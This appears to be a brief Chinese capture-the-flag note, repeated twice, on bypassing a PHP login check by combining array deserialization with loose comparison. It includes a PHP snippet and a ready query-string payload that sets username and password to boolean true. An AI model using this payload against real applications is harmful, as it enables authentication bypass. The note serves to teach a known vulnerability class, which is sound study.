数组反序列化+弱比较
<?php
$info = array('username'=>true,'password'=>true);
echo serialize($info);
?>
//?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
1.构造不能用类,因为$data_unserialize
只是一个变量,不能存类,要用数组来构造。
2.true、0与字符串比较为真。
数组反序列化+弱比较
<?php
$info = array('username'=>true,'password'=>true);
echo serialize($info);
?>
//?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
1.构造不能用类,因为$data_unserialize
只是一个变量,不能存类,要用数组来构造。
2.true、0与字符串比较为真。